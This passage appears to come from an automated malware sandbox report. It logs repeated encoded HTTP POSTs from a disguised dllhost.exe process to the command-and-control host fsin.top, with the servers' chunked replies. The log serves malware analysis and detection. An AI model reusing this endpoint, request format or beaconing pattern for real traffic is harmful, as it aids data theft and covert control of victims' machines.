                                                  Data Ascii: QRXQZZ]S\^ZQTWWSW_^WVYQX[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!$#>?' (]=*%17%/"$#8. !(%5&G#.X!
                                                  Aug 1, 2024 07:37:40.153027058 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:40.404017925 CEST | 584 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:40 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mI0Wr44hX6OBun7I5Lxkw0RkH8CxfYx%2BCqwOaeqbF1kPx5FWcbw4BQFDcp5hU7u1QRbeZe2vhu5aEE6FxtgjbyY7qRBRN%2Bhckf6vmVEJjekt00iGR%2FJtdYVuhQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a41ad258c53-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  20 | 192.168.2.4 | 49756 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:40.528806925 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:40.881001949 CEST | 1012 | OUT | Data Raw: 51 52 58 51 5a 54 5d 51 5c 5e 5a 51 54 54 57 52 57 53 5e 57 56 5f 51 5f 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QRXQZT]Q\^ZQTTWRWS^WV_Q_[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!$&5=X0+_(+*"Y%/&"_&#$W/#_!+Y1&G#.X!,
                                                  Aug 1, 2024 07:37:40.992644072 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:41.161361933 CEST | 590 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:41 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ynEyw%2FN5CF0A%2BGxcSR%2FMhZyagDfkueYu9OFTQdyTj0hb7mXimfNT%2FKnAla0ReHBe7QGRN3OuEGCDrmh%2FT9QHfFTg0ZK9mwXF8G4JL2jHy64DMk60a44%2BwBIikg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a46eb9032ee-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  21 | 192.168.2.4 | 49757 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:41.297643900 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:41.646648884 CEST | 1012 | OUT | Data Raw: 54 50 58 53 5a 55 5d 54 5c 5e 5a 51 54 51 57 56 57 5f 5e 5b 56 54 51 58 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TPXSZU]T\^ZQTQWVW_^[VTQX[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"_$"9[">805<+*)%.28?W'/6&#4V->68(2&G#.X!
                                                  Aug 1, 2024 07:37:41.764029026 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:41.972738028 CEST | 586 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:41 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qv1dkMdBrW9gdge%2FmCLTNuG5udFjN138P707ZOR1CVbsMRPkIyLOTacPhJa7uAo%2FeUmrvozpcpS57SGSa4nh0VYQpCwUFIsaKz%2FZd1UfjmBjvlihcey21KoK%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a4ba96743cf-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  22 | 192.168.2.4 | 49758 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:42.158458948 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:42.506310940 CEST | 1012 | OUT | Data Raw: 51 57 58 51 5f 5f 5d 57 5c 5e 5a 51 54 50 57 57 57 57 5e 56 56 5a 51 5e 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QWXQ__]W\^ZQTPWWWW^VVZQ^[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"Y$!!]5=]'&;_(2W)%Q25%/8.+]58+'5&G#.X!<
                                                  Aug 1, 2024 07:37:42.614578962 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:42.856693029 CEST | 586 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:42 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nU0xul8lKE74mYcpyp7w6Vj6zdst7%2F5ejf66UoKvn3Ve%2BMvT8E4cn1ghbbdqIgu4i0pARHk1gQHjy60Rg%2FCtSmqsSEGB1p3mAHGOaYVJFeMnZ0LLhhW2%2BJKsRA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a511c224262-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  23 | 192.168.2.4 | 49759 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:42.996453047 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:43.350630999 CEST | 1012 | OUT | Data Raw: 51 50 58 52 5f 58 5d 56 5c 5e 5a 51 54 50 57 56 57 5f 5e 5c 56 5c 51 5b 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QPXR_X]V\^ZQTPWVW_^\V\Q[[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!0!6"-('5(86T>2/&?.&/X,68Y'5&G#.X!<
                                                  Aug 1, 2024 07:37:43.451329947 CEST | 25 | IN | HTTP/1.1 100 Continue


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  24 | 192.168.2.4 | 49760 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:43.512646914 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1284
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:43.865328074 CEST | 1284 | OUT | Data Raw: 51 52 58 55 5a 5b 58 50 5c 5e 5a 51 54 53 57 57 57 52 5e 5e 56 5f 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QRXUZ[XP\^ZQTSWWWR^^V_Q\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!0=Z5[8&5#X?"=%(#W&,)%00S,=#^!'5&G#.X!0
                                                  Aug 1, 2024 07:37:43.977042913 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:44.190253973 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:44.226803064 CEST | 731 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:44 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4g109CTDFG%2FPb74w9o7v0lDdTZfMV1ZTVgyqwBfxTs3fGDyyiWJLD0sbMsyXyzvLOLbolmHRhFidXbV%2Fd8FZR4ckNK5f6zjVkNZZtaLJaHuKCpgLzy6vw2WUxA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a5988125589-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 39 38 0d 0a 02 1f 21 0f 33 3b 3e 1c 22 3a 20 54 29 0c 2d 1a 3d 30 23 05 2b 07 09 58 32 02 3e 06 26 28 24 55 21 3f 2e 01 27 11 2e 54 32 31 22 10 3d 0d 21 51 04 11 25 04 34 33 31 04 2b 29 0e 01 33 3b 24 01 34 36 27 05 30 0d 3d 50 21 29 24 59 3d 22 35 11 29 31 23 54 39 3b 34 05 3f 0a 2f 04 25 26 2a 56 0d 17 22 1f 2e 16 12 50 33 22 2c 56 20 05 37 55 34 38 2d 5c 3d 06 2e 11 29 24 07 06 2d 33 09 1c 3d 23 0f 09 3f 03 3d 12 28 14 29 54 24 39 22 5d 2c 03 2d 48 0e 3d 59 4d 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 98!3;>": T)-=0#+X2>&($U!?.'.T21"=!Q%431+)3;$46'0=P!)$Y="5)1#T9;4?/%&*V".P3",V 7U48-\=.)$-3=#?=()T$9"],-H=YM0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  25 | 192.168.2.4 | 49761 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:43.639276981 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:43.990190983 CEST | 1012 | OUT | Data Raw: 51 53 58 5d 5a 58 5d 54 5c 5e 5a 51 54 50 57 56 57 52 5e 5b 56 5d 51 5b 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QSX]ZX]T\^ZQTPWVWR^[V]Q[[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!$1:"[#$+;)6%/&Y2Y1 0,8#8715&G#.X!<
                                                  Aug 1, 2024 07:37:44.093945026 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:44.342721939 CEST | 584 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:44 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1NqV80RkwBZ3XI7UgLd9Nu2Z1rBT55%2BmKiXahIxfp6F4n2%2BPUBuh4nAbLVRvb0gF9DS8lkVmrvzYCgR%2FSwcjr3IjLZF2Rx39txme0jDZebTBA0R363cJRoSejQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a5a4e7e426d-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  26 | 192.168.2.4 | 49762 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:44.485225916 CEST | 250 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:37:44.836054087 CEST | 1012 | OUT | Data Raw: 54 51 58 50 5a 55 58 57 5c 5e 5a 51 54 50 57 50 57 53 5e 5e 56 5b 51 5f 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TQXPZUXW\^ZQTPWPWS^^V[Q_[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"3T%5(]'%?].R?5-2(8%*_$ ,S,X$";(&&G#.X!<
                                                  Aug 1, 2024 07:37:44.946448088 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:45.095982075 CEST | 586 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:45 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dgnsBcvcXYHNlSwX8cTabDFg4UrmOio6qMBXzFMllMQeUR8oUXQzGZdxX6Avyk%2BAkX009KOZUDzb0np10Fh93%2B%2BfSHgaad2gZke4sRSXxiy%2BODRh0IfweKUbRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a5fa93e4356-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  27 | 192.168.2.4 | 49763 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:45.232281923 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:45.585434914 CEST | 1012 | OUT | Data Raw: 54 51 58 51 5a 5e 5d 56 5c 5e 5a 51 54 52 57 55 57 5e 5e 56 56 5a 51 59 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TQXQZ^]V\^ZQTRWUW^^VVZQY[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"$T)6-+3%\+>6\2(+V%/[$#/=?\!($1&G#.X!4
                                                  Aug 1, 2024 07:37:45.677455902 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:45.946788073 CEST | 586 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:45 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dbhAY5a1QtxSNkroVd6%2Bznxrp%2FdFPkPy4AiskcbP3gcMNyb308m9EHPaz0vNBudikQhBrS%2Fkb0rZIAbmR8GIGkOc%2BhFzxZwnvB0By8PVk9kmMzxrQyeVVMt0YA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a643ab04337-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  28 | 192.168.2.4 | 49764 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:46.162457943 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:46.521637917 CEST | 1012 | OUT | Data Raw: 54 51 58 50 5a 58 5d 51 5c 5e 5a 51 54 53 57 57 57 56 5e 5b 56 59 51 5b 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TQXPZX]Q\^ZQTSWWWV^[VYQ[[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"X'"5!=&%0(>S>5&^&+'2?X&0#,X/]#;+^'%&G#.X!0
                                                  Aug 1, 2024 07:37:46.610313892 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:46.775264978 CEST | 584 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:46 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=97xxsHL1LWokxpQPvOHyyk%2Bqf5opnfiXvPmYrAzyhiJIbxIRRNzdRKRkpsyPFbVBFkzELhu%2BYczeL4uSnVbMMDfWM%2Bb2Uz16WUD8K2X5j95J9oq0bLXDIlKBjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a6a0bb8423a-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  29 | 192.168.2.4 | 49765 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:46.937537909 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:47.293922901 CEST | 1012 | OUT | Data Raw: 54 50 58 50 5a 5a 5d 53 5c 5e 5a 51 54 55 57 54 57 53 5e 59 56 5b 51 5f 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TPXPZZ]S\^ZQTUWTWS^YV[Q_[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!'*"'63_<;==66X2#W%*&'8-/!8;X'%&G#.X!(
                                                  Aug 1, 2024 07:37:47.382955074 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:47.636579037 CEST | 583 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:47 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3hRyXrg82PMAAyIOpFrOlTCS292K9NsDKM%2BoyaxnxfwHCm5hQbSoaJR%2BfDTlMWMlhNMW%2Fvug3AdcLeR1z6%2FBSKNqdbuxE82xnL1JLMUuN7Il55QhZ346Xrn%2FIA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a6eda6b7c9c-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a
                                                  Data Ascii: 40W[Y
                                                  Aug 1, 2024 07:37:47.723092079 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  30 | 192.168.2.4 | 49766 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:47.856177092 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
